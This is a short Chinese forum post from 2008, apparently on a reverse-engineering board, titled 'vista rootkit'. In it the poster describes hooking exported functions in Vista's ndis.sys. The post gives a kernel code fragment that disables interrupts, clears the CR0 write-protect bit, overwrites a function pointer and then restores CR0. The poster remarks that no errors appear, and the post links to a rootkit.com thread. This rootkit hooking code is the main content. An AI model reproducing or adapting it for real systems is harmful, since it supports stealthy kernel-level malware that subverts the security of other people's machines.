-
-
[讨论]vista rootkit
-
发表于: 2008-9-13 18:04 4476
-
我已经很轻意地突破了Rootkit环境,我想在vista的ndis.sys文件中挂接一些函数的导出地址.我用了一个很滥的技术便实现了—利用系统分页得到写权限以下是代码:
编译执行后系统什么错误提示都没有.
原作者地址: https://www.rootkit.com/board.php?disp=12371&did=edge0&closed=2&thread=12371
old_virt_func_addr = (ULONG *) MmGetSystemAddressForMdlSafe(mdl, NormalPagePriority); //得到系统分面地址 __asm { cli push eax mov eax, cr0 mov SAVECR0, eax and eax, 0xFFFEFFFF mov cr0, eax//设置系统页面文件的写权限,cr0的第17位是页 //写权限控制. pop eax } *(ULONG *)old_virt_func_addr = new_function_addr; __asm { push eax mov eax, SAVECR0 mov cr0, eax pop eax sti }.
编译执行后系统什么错误提示都没有.
原作者地址: https://www.rootkit.com/board.php?disp=12371&did=edge0&closed=2&thread=12371
赞赏
他的文章
- [讨论]vista rootkit 4477
- [讨论]看这段郁闷的代码~ 5231
- 怎样可以通过函数地址来获取函数的值信息[讨论] 6010
- 驱动程序开发环境的设置(vc6.0+ddkbild+server 2003)[分享] 9856
- 一个RcR32生成工具源码[分享] 5340
看原图
赞赏
雪币:
留言: